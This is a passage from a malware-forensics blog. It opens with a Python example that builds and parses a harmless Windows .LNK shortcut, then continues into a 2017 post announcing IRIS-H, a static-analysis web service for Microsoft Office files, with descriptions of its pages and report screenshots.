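                   0x10: "DIRECTORY", 0x20: "ARCHIVE", 0x80: "NORMAL"}
SHOW_COMMAND = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}
# StringData entries follow in this fixed order, each present only if its flag is set.
STRING_DATA = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
               (0x20, "arguments"), (0x40, "icon_location"))
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """FILETIME counts 100 ns ticks since 1601-01-01 UTC; zero means 'not set'."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10) if ft else None


def datetime_to_filetime(dt):
    delta = dt - EPOCH_1601
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def build_sample_lnk():
    """Constructed .LNK for this demo: header, three StringData entries, TerminalBlock."""
    def string_data(text):            # CountCharacters (uint16) + UTF-16LE characters
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    when = datetime_to_filetime(datetime(2017, 11, 7, tzinfo=timezone.utc))
    flags = 0x08 | 0x10 | 0x20 | 0x80  # HasRelativePath|HasWorkingDir|HasArguments|IsUnicode
    header = struct.pack(HEADER_FMT, 76, LINK_CLSID, flags, 0x20,  # FILE_ATTRIBUTE_ARCHIVE
                         when, when, when, 0, 0, 7, 0, 0, 0, 0)     # ShowCommand = 7
    body = (string_data("..\\..\\Windows\\System32\\notepad.exe")
            + string_data("C:\\Users\\Public") + string_data("readme.txt"))
    return header + body + b"\x00\x00\x00\x00"  # TerminalBlock ends ExtraData


def parse_lnk(data):
    """Decode ShellLinkHeader and StringData, skipping LinkTargetIDList/LinkInfo if present."""
    if len(data) < struct.calcsize(HEADER_FMT):
        raise ValueError("too short for a ShellLinkHeader")
    (size, clsid, flags, attrs, ctime, atime, wtime, fsize, icon, show,
     hotkey, _r1, _r2, _r3) = struct.unpack_from(HEADER_FMT, data, 0)
    if size != 76 or clsid != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    info = {
        "flags": [name for bit, name in LINK_FLAGS.items() if flags & bit],
        "attributes": [name for bit, name in FILE_ATTRIBUTES.items() if attrs & bit],
        "creation_time": filetime_to_datetime(ctime),
        "access_time": filetime_to_datetime(atime),
        "write_time": filetime_to_datetime(wtime),
        "file_size": fsize, "icon_index": icon, "hotkey": hotkey,
        # The spec says any value other than 1, 3 or 7 is treated as SW_SHOWNORMAL.
        "show_command": SHOW_COMMAND.get(show, "SW_SHOWNORMAL"),
    }
    offset = 76
    if flags & 0x01:   # LinkTargetIDList: IDListSize (uint16) followed by the list
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & 0x02:   # LinkInfo: its first DWORD is the whole structure's size
        offset += struct.unpack_from("<I", data, offset)[0]
    is_unicode = bool(flags & 0x80)
    for bit, name in STRING_DATA:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, offset)[0]
        offset += 2
        nbytes = count * 2 if is_unicode else count
        raw = data[offset:offset + nbytes]
        # Non-Unicode strings use the system code page; cp1252 is assumed here.
        info[name] = raw.decode("utf-16-le" if is_unicode else "cp1252")
        offset += nbytes
    return info


def reconstruct_command_line(info):
    """Approximate the launched command: target path (from StringData) plus arguments."""
    target = info.get("relative_path") or info.get("name") or "<target not in StringData>"
    return f'"{target}" {info.get("arguments", "")}'.strip()


def evaluation_notes(info):
    """Illustrative heuristics (not IRIS-H's rules) an analyst would want surfaced."""
    notes = []
    if info["show_command"] == "SW_SHOWMINNOACTIVE":
        notes.append("target window opens minimized and inactive, out of the user's sight")
    if info.get("arguments"):
        notes.append("target is launched with command-line arguments: " + info["arguments"])
    return notes
```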
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6RsHB0Ev2NIkaPG_O1vnb274YMimOl74egwzeL9-wpokWwWxG4RAuYeCLRCxZBrZQfJp4nALKA7iddDxB2yehnD7K4k_DVQqsPOzLeevEl4aCIhcR7xIhtZ33HprM6gNm7jilH6oHYGs7/s1600/shellLinkHeader.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="875" data-original-width="735" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6RsHB0Ev2NIkaPG_O1vnb274YMimOl74egwzeL9-wpokWwWxG4RAuYeCLRCxZBrZQfJp4nALKA7iddDxB2yehnD7K4k_DVQqsPOzLeevEl4aCIhcR7xIhtZ33HprM6gNm7jilH6oHYGs7/s320/shellLinkHeader.PNG" width="268" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Data derived from ShellLinkHeader</td></tr>
</tbody></table>
<div>
In addition, IRIS-H attempts to resolve the "Known Folder" GUID and the "Special Folder" ID and display their corresponding descriptions. See an example below.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPGnVXtDa2RSiBK_anuY8bio_-KZ7tWey3npQKezoGWqX0SgfRFR-UUlEUs2cUhoBxbJGJl5L3e4d_iAGEteNgjDzQf1_MgQussDfPNjE4NOhUp8XjJqwtxNx8oEPjE7rlxSGN0OA4R-za/s1600/folders.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="399" data-original-width="732" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPGnVXtDa2RSiBK_anuY8bio_-KZ7tWey3npQKezoGWqX0SgfRFR-UUlEUs2cUhoBxbJGJl5L3e4d_iAGEteNgjDzQf1_MgQussDfPNjE4NOhUp8XjJqwtxNx8oEPjE7rlxSGN0OA4R-za/s320/folders.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Enriched data derived from KnownFolderDataBlock and SpecialFolderDataBlock</td></tr>
</tbody></table>
<div>
Examples of full reports can be found on the links below:</div>
<div>
<br /></div>
<div>
<a href="https://iris-h.malwageddon.com/report/50146115513f71531ea334071c69a771">https://iris-h.malwageddon.com/report/50146115513f71531ea334071c69a771</a> - submitted LNK file.</div>
<div>
<a href="https://iris-h.malwageddon.com/report/738e74f744e554d6ac89899357eca506">https://iris-h.malwageddon.com/report/738e74f744e554d6ac89899357eca506</a> - embedded LNK file found in a Microsoft Office document.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
Denis O'Brien (http://www.blogger.com/profile/07233679823730420087)<br />
<br />
<b><span style="color: #3d85c6; font-size: large;">Announcement: IRIS-H (alpha) - Online Digital Forensic Tool for Microsoft Office Files</span></b><br />
Published 2017-09-21T20:13:00.002+01:00, updated 2017-10-30T14:14:08.380+00:00<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<b><span style="color: #3d85c6; font-size: large;">Introduction</span></b><br />
<br />
IRIS-H is an online web service that performs static analysis of files stored in directory-based or strictly structured formats. The service disassembles a submitted file into individual components based on the detected file format and performs static analysis of each component. The analysis sequentially reads each component's binary data and enriches it with human-readable information, based on the binary data description in the official file format specification. A further rule-based evaluation is performed on the extracted data to establish whether the submitted file can be harmful to a computer system.<br />
<br />
<b><span style="color: #3d85c6; font-size: large;">Disclaimer</span></b><br />
<br />
Currently, the service is still being developed and running in <a href="https://en.wikipedia.org/wiki/Software_release_life_cycle#Alpha" rel="nofollow" target="_blank">alpha</a> phase of the release life cycle. Application updates are pushed regularly and may require full data flush. There is absolutely no guarantee the uploaded data and corresponding generated reports will be available during '<span style="color: #3d85c6;">alpha</span>' cycle. Any development/maintenance is done in my free time - this service is the result of a hobby rather than a paid job.<br />
<br />
<span style="color: #3d85c6; font-size: large;"><b>Acknowledgements</b></span><br />
<span style="color: #3d85c6; font-size: large;"><b><br /></b></span>
I'd like to say '<span style="color: #3d85c6;">Thank You!</span>' to the following individuals and organizations for their direct and/or indirect support. 👍<br />
<ul>
<li>VirusTotal crew</li>
<li>StackOverflow ReactJS and NodeJS communities</li>
<li>Decalage</li>
<li>Individual security researchers who provided their invaluable feedback that materialized into improved and new features (I do not support fame leeching, so no names, but you know who you are)</li>
</ul>
<br />
<b><span style="color: #3d85c6; font-size: large;">IRIS-H Service</span></b><br />
<br />
<b><span style="color: #3d85c6;">Pre-history</span></b><br />
<br />
(skip to the next paragraph if you're not into fairy tales and stuff...)<br />
Once upon a time I decided that challenging myself with learning JavaScript flavors was a great idea... well, I still think it's a great idea... So, I set out on a quest to build something as I learned it. Looking far and wide, I thought a simple console-based digital forensic tool could be a good start. Little did I know at the time how far it would actually take me... and so I ended up creating IRIS-H. The name doesn't really stand for anything with '<span style="color: #3d85c6;">Next Generation</span>' or '<span style="color: #3d85c6;">Artificial Intelligence</span>' or '<span style="color: #3d85c6;">Blockchain</span>' or even '<span style="color: #3d85c6;">Cyber</span>' buzzwords in mind (sorry, no lasers either), despite having a logo. It's simply my tribute to all the hard-working Irish people I have had the pleasure of encountering in my last 20 years living in Ireland.<br />
<br />
<b><span style="color: #3d85c6;">So, what's all about?...</span></b><br />
<br />
I'd like to share an online tool I've been working on for the last few months. IRIS-H is positioned mainly as a digital forensics tool, though it applies some rule-based logic to determine the outcome of opening the analysed file on a computer system. The digital forensics aspect revolves around putting descriptive meaning on the binary data derived from the analyzed file. Where possible, the tool attempts to extract digital artifacts to allow for further manual or automated analysis. In the case of malicious file analysis, a trained eye could leverage the tool to perform a simple '<span style="color: #3d85c6;">campaign</span>'-type attribution based on the data derived by the service and their best judgment.<br />
<br />
It's important to note that IRIS-H is not a sandbox environment. The submitted file is never opened with its corresponding host application. This slightly limits IRIS-H's ability to obtain network-based indicators of compromise (IoCs). Still, the service attempts to evaluate the risk of opening the file on a computer system based on the IoCs derived from the binary data and the presence of certain digital artifacts. Sometimes, when you are looking for a quick answer, this might be all you need.<br />
<br />
IRIS-H can do some tricks, but the service is far from being mature. It's at the stage where it just started bringing some value to the work I do, so I hope it can do the same for the others.<br />
<br />
<b><span style="color: #3d85c6;">Right, what can it do?...</span></b><br />
<br />
The interaction with the service is done through its web interface. The interface allows for navigation through web pages that offer specific service features.<br />
<ul>
<li><b><span style="color: #3d85c6;">Home Page</span></b> - offers ability to view latest file submissions. The view is utilizing a table to present the following data: submission time, submitted file MD5 hash, file name at submission time, detected file type and the result of rule-based risk evaluation.</li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz9PW-_-MWTWdfdpXjR0VBbf4AfkhU2iKm6wECP6eGGXKnzGzUvQ-0IOXwfiUqX2v11MlReLlfUpfDyN-AiZ2L1qoIx6AUklzCPQhzWp5hDpLAahmZmWeuvjgwsLefC-_2-7koovgOprim/s1600/homePage.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="" border="0" data-original-height="210" data-original-width="997" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz9PW-_-MWTWdfdpXjR0VBbf4AfkhU2iKm6wECP6eGGXKnzGzUvQ-0IOXwfiUqX2v11MlReLlfUpfDyN-AiZ2L1qoIx6AUklzCPQhzWp5hDpLAahmZmWeuvjgwsLefC-_2-7koovgOprim/s320/homePage.PNG" title="latest submissions view" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Latest Submissions table view</td></tr>
</tbody></table>
<ul>
<li><span style="color: #3d85c6;"><b>Search Page</b></span> - offers ability to search the service database using MD5, SHA1 or SHA256 hash strings. If a successful analysis already exists for the file with the provided hash the user is forwarded to a corresponding Report Page(more on this below).</li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-hSJyWtUV05gE92GTn_x8AsAZ8NdrkPO9fUHhPwWwzwTmezruhPbhJRWWQNUJ8kyxjQIB0BPb4xqiPjZ6wrcVgJyXo4KbM_nqQ7hWhujZZJCRr6IhBjm-IreG_RtZjGNSNG5fnYWAKchG/s1600/searchPage.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="124" data-original-width="648" height="61" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-hSJyWtUV05gE92GTn_x8AsAZ8NdrkPO9fUHhPwWwzwTmezruhPbhJRWWQNUJ8kyxjQIB0BPb4xqiPjZ6wrcVgJyXo4KbM_nqQ7hWhujZZJCRr6IhBjm-IreG_RtZjGNSNG5fnYWAKchG/s320/searchPage.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Search Form view</td></tr>
</tbody></table>
<br />
<ul>
<li><b><span style="color: #3d85c6;">Submit Page</span></b> - offers ability to submit a file to be analyzed. File size and type validations are performed on this page. The page provides '<span style="color: #3d85c6;">drag-and-drop</span>' and '<span style="color: #3d85c6;">no-submit-button</span>' component to allow service users to select a file to submit. The upload file size limit is set to 10MB. If submitted file type is not supported an alert is spawned notifying the user. Only single file submissions are supported at this time. ZIPed files are not accepted yet.</li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8FsuzOCAsy53FTvoiwh4ij4hz4y3a2hrAl40a_d3RutbDKuRYLQzjgQ3YOLL9vNWi_usswERbnGC3PLYQiL2tSwTs-E5_SdDdH9AmzsJ4us73b5a5pHa7UzGj_B-t5cq4U2zTJB195B32/s1600/submitPage.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="412" data-original-width="1105" height="119" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8FsuzOCAsy53FTvoiwh4ij4hz4y3a2hrAl40a_d3RutbDKuRYLQzjgQ3YOLL9vNWi_usswERbnGC3PLYQiL2tSwTs-E5_SdDdH9AmzsJ4us73b5a5pHa7UzGj_B-t5cq4U2zTJB195B32/s320/submitPage.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Submit Page dropzone box</td></tr>
</tbody></table>
<div>
The following are some examples of what IRIS-H service can handle at this stage:</div>
<div>
<ul>
<li>Files saved in Microsoft Office 97-2003 format (DOC, XLS, PPT) - only DOC files are fully supported at the moment</li>
<li>Files saved in Microsoft Office 2007+ format (DOCX, PPTX) - only DOCX files are fully supported at the moment. XLSX are not being accepted yet.</li>
<li>VBA project files extracted from the Microsoft Office documents that are saved in Open Office XML format</li>
<li>Objects embedded into other Microsoft Office documents including those in OOXML format</li>
</ul>
</div>
<div>
Technically, IRIS-H will accept and attempt to process any file in OLE-CF format. There are case-by-case limitations, though, where the service might not have a parser for '<span style="color: #3d85c6;">not-so-common</span>' OLE stream types.</div>
<div>
<br /></div>
Once a file is accepted and uploaded, IRIS-H begins dissecting the submitted file into separate components for further automated static analysis. When the analysis is completed, the user is forwarded to a corresponding Report Page.<br />
<br />
<b><span style="color: #3d85c6;">Report Page</span></b> is where everything comes together and to help service users navigate through the chunks of information, the page provides a navigation bar.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnEyKMkoInjoLfbn6YFbUMzA-IeikqUMsOCyPnaaIejWdnhxWqiO54hJqbzwHUu0rXR230rMKDZVthytlUwQpBxrXlxoO_uim1srTBQfsLt6RiL9rb6qD7v0rtuLfts1k1HBNVhe9UGgHM/s1600/leftNavBar.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="334" data-original-width="170" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnEyKMkoInjoLfbn6YFbUMzA-IeikqUMsOCyPnaaIejWdnhxWqiO54hJqbzwHUu0rXR230rMKDZVthytlUwQpBxrXlxoO_uim1srTBQfsLt6RiL9rb6qD7v0rtuLfts1k1HBNVhe9UGgHM/s320/leftNavBar.PNG" width="162" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Left Navigation Bar Example</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
The information presented on the Report Page is a mixture of high-level and '<span style="color: #3d85c6;">deep dive</span>' forensics data. The original idea was to export it into a file format that can be stored or shared (PDF or similar), but due to some technical challenges I couldn't overcome, I instead made each report available through its URL.<br />
<br />
<span style="color: #3d85c6;"><b>Alright, but what's in it for me?...</b></span><br />
<br />
Well, one would have to try it out and see, right? 😜 IRIS-H service is available at <a href="https://iris-h.malwageddon.com/">https://iris-h.malwageddon.com/</a> . Please make sure you get yourself familiar with <a href="https://iris-h.malwageddon.com/tos" target="_blank">Terms of Service</a>. There is also <a href="https://iris-h.malwageddon.com/about" target="_blank">About</a> page that provides more details about the service.<br />
<br />
... but just to give you some ideas, the screenshots below highlight some of the findings I came across using file samples at my disposal.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3D1Q8OS6BNwkRfroxpiWlVSyCDyG2oCdjK_FHOsvbDEA8B3Hlvubfai7e5jbNV34AdpKnK2mkCxo63Wqs_nmC_0MXT8Ljh_rTN5SqwAcTw_hSbq2fTQaMZX6msW6zerFaTO9C8-hfjc_7/s1600/reportPageEx13.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1018" data-original-width="1240" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3D1Q8OS6BNwkRfroxpiWlVSyCDyG2oCdjK_FHOsvbDEA8B3Hlvubfai7e5jbNV34AdpKnK2mkCxo63Wqs_nmC_0MXT8Ljh_rTN5SqwAcTw_hSbq2fTQaMZX6msW6zerFaTO9C8-hfjc_7/s320/reportPageEx13.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">VBA Digital Signature details</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUyG2xtrakrlQOu-_Vo6Vf0qrCiPua80pGGH3f__3gilsyQpvUdTDX37YC70VlMEW8jLOvNLt0gn8XsPMjGb32Y7ccSLxLBy1xwW9hHwYDWotuoVMGX65gpdezfZfHxYlUci_WZTD-yZF6/s1600/reportPageEx12.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="277" data-original-width="685" height="129" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUyG2xtrakrlQOu-_Vo6Vf0qrCiPua80pGGH3f__3gilsyQpvUdTDX37YC70VlMEW8jLOvNLt0gn8XsPMjGb32Y7ccSLxLBy1xwW9hHwYDWotuoVMGX65gpdezfZfHxYlUci_WZTD-yZF6/s320/reportPageEx12.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Detection for Microsoft Office field characters</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8IznPQC6enP7K3dsfPw-OV215RyW_F4yyIZwaCbJmRqK5b_iIPH7i9rhREeOdxr4rj_uKyjYldYEZBHCOuJZbj5MZ9al_ivCNm9vzNHYMjDw3RJpc7Y9HhL9aB3F4Ojm4TjO8Qd9zZmbq/s1600/reportPageEx1.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="218" data-original-width="627" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8IznPQC6enP7K3dsfPw-OV215RyW_F4yyIZwaCbJmRqK5b_iIPH7i9rhREeOdxr4rj_uKyjYldYEZBHCOuJZbj5MZ9al_ivCNm9vzNHYMjDw3RJpc7Y9HhL9aB3F4Ojm4TjO8Qd9zZmbq/s320/reportPageEx1.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H detected embedded VBS script in the submitted file</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl3BHfP81R8Ib3OZXKXmsBm7woCujOIF0K2cddQrVqCp4IqSSkW5ERutivkoGk01CkhVJZf2thIa13TSOP0CAKH9fWuFBuhn3FLGfTvDFxJj9x6QMcv9iIR4BHqfVSq0Y8dF1C6Y1fZzCI/s1600/reportPageEx2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="743" data-original-width="622" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl3BHfP81R8Ib3OZXKXmsBm7woCujOIF0K2cddQrVqCp4IqSSkW5ERutivkoGk01CkhVJZf2thIa13TSOP0CAKH9fWuFBuhn3FLGfTvDFxJj9x6QMcv9iIR4BHqfVSq0Y8dF1C6Y1fZzCI/s320/reportPageEx2.PNG" width="267" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">'<span style="color: #3d85c6;">deep-dive</span>' digital forensics view of the VBS file reported above.</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCfal0wTjK2TvHL1OwI0S-CqEn_pZ2iRkzMsdQbXr1P3LQJy5CXLdFlBvRMa2c9ZlKn8ICa7eBJ6DK-mRN9cvOM3snBdTtHrAwrbEVsL4pW60fOa-6Np6LiJZlZYdN0gMFlA9uGlRj6wfI/s1600/reportPageEx3.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="867" data-original-width="623" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCfal0wTjK2TvHL1OwI0S-CqEn_pZ2iRkzMsdQbXr1P3LQJy5CXLdFlBvRMa2c9ZlKn8ICa7eBJ6DK-mRN9cvOM3snBdTtHrAwrbEVsL4pW60fOa-6Np6LiJZlZYdN0gMFlA9uGlRj6wfI/s320/reportPageEx3.PNG" width="229" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Results of VBA scripts analysis</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF2GB7QZZc6ju2YlFMUaxOgeOGIfOOI4QcsOt7YSValM9cfI7tneVksW5cPP0iKQUnSOCZyUBYuiSLprJRn2p88ckrFaNrem-WxsfpL-8dvQsBUG5Pz5B5KTbtDrbl-Ymqv0bpapReBISc/s1600/reportPageEx4.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="304" data-original-width="624" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF2GB7QZZc6ju2YlFMUaxOgeOGIfOOI4QcsOt7YSValM9cfI7tneVksW5cPP0iKQUnSOCZyUBYuiSLprJRn2p88ckrFaNrem-WxsfpL-8dvQsBUG5Pz5B5KTbtDrbl-Ymqv0bpapReBISc/s320/reportPageEx4.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Partial view of document embedded form analysis showing UA string hidden in form's tag field</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDyK2Gmf2XRLUyN2UjONCEB5JcClzx0afMR-KZWgQXYgTdJxEiS6XcVjQMPvRJ_oAZj7yevACOksr8VRZpZ8euZQMTK52hcVe3dAlWlDiP1oEQz_o_WUQ20PaVO5BH8sROxnXnyv4dJs1x/s1600/reportPageEx5.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="235" data-original-width="623" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDyK2Gmf2XRLUyN2UjONCEB5JcClzx0afMR-KZWgQXYgTdJxEiS6XcVjQMPvRJ_oAZj7yevACOksr8VRZpZ8euZQMTK52hcVe3dAlWlDiP1oEQz_o_WUQ20PaVO5BH8sROxnXnyv4dJs1x/s320/reportPageEx5.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Partial view of document meta data analysis showing URLs stored in the document</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8xp7nL9N9OP4Brp-rsYFtwjtXzCqknEQBmWAO88raA4AQVBII-J5G1w7vuqN4PI1-LGJ42aoh_3hCYkuQjxIpAEKsf51o5CH2Up3vaHhsdfBLLyxpjqMYjBalAoFvJPJaaIoKcWoenFVL/s1600/reportPageEx6.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="793" data-original-width="623" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8xp7nL9N9OP4Brp-rsYFtwjtXzCqknEQBmWAO88raA4AQVBII-J5G1w7vuqN4PI1-LGJ42aoh_3hCYkuQjxIpAEKsf51o5CH2Up3vaHhsdfBLLyxpjqMYjBalAoFvJPJaaIoKcWoenFVL/s320/reportPageEx6.PNG" width="251" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">'<span style="color: #3d85c6;">deep-dive</span>' forensics view of a linked object showing object's name and network path where it's stored</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgHpC2V1TNOsjMN-BXTzs7rjvS5w3h6HkHTBELP11M7xBwkdK7VHRPsIMyLoDNYbWGrJClX7Dibdp_KgUAfCRH4H7JwnikO1FELWha4hSMYLlbj6jexE-fUeNCbRBK_CjofQ9tPAKp6xhv/s1600/reportPageEx7.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="495" data-original-width="623" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgHpC2V1TNOsjMN-BXTzs7rjvS5w3h6HkHTBELP11M7xBwkdK7VHRPsIMyLoDNYbWGrJClX7Dibdp_KgUAfCRH4H7JwnikO1FELWha4hSMYLlbj6jexE-fUeNCbRBK_CjofQ9tPAKp6xhv/s320/reportPageEx7.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">'<span style="color: #3d85c6;">deep-dive</span>' forensics view of data from WordDocument stream showing Revision History, System Fonts and Users data</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOUycjYVuJxA5iAkakL6VgPzUqyL8ZH4Q_1N0H7Edo_rVfERsD5574k7N6nif0FntGYhamDzLwHPNInxnlZzZxBZ4QXPYeXEEf9d9xJEidEa2U6xIe3kZLb4tPbJ7pm5WOTUo7ukqfaoRX/s1600/reportPageEx8.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="571" data-original-width="620" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOUycjYVuJxA5iAkakL6VgPzUqyL8ZH4Q_1N0H7Edo_rVfERsD5574k7N6nif0FntGYhamDzLwHPNInxnlZzZxBZ4QXPYeXEEf9d9xJEidEa2U6xIe3kZLb4tPbJ7pm5WOTUo7ukqfaoRX/s320/reportPageEx8.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Example of Extracted Images preview</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
